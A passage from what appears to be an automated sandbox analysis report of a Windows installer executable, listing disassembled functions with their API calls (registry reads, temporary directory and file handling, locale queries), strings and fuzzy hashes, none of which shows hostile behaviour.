                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessageNotifySend
                                                            • String ID: (\m$MS PGothic
                                                            • API String ID: 3556456075-219475269
                                                            • Opcode ID: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                            • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                            • Opcode Fuzzy Hash: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                            • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
                                                            • Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
                                                            • Opcode Fuzzy Hash: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
                                                            • Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CountTick
                                                            • String ID: Failed to remove temporary directory: $bm
                                                            • API String ID: 536389180-2673898769
                                                            • Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                            • Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
                                                            • Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                            • Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                            • API String ID: 3535843008-1113070880
                                                            • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                            • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                            • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                            • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040952E, Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0040959A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009530), ref: 004095D7
                                                            • RtlUnwind.KERNEL32(?,?,Function_00009530,00000000,?,?,Function_00009530,?), ref: 00409602
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$Unwind
                                                            • String ID:
                                                            • API String ID: 1141220122-0
                                                            • Opcode ID: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                            • Instruction ID: e545f85d7011ee45bc6c766d7eccadc728dc4c1814e3ea314169116c21f0ec9d
                                                            • Opcode Fuzzy Hash: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                            • Instruction Fuzzy Hash: 8C3180B1604200AFD720DB15CC84F67B7E5EB84714F14896AF408972A3CB39EC84CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 716092398-1824977358
                                                            • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                            • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 47109696-1019749484
                                                            • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                            • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            Strings
                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                            • API String ID: 71445658-1109908249
                                                            • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                            • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                            • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseFileNext
                                                            • String ID:
                                                            • API String ID: 2066263336-0
                                                            • Opcode ID: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                            • Opcode Fuzzy Hash: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                            • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                            • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                            • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                            • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                            • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
                                                            • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                            • Opcode Fuzzy Hash: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
                                                            • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

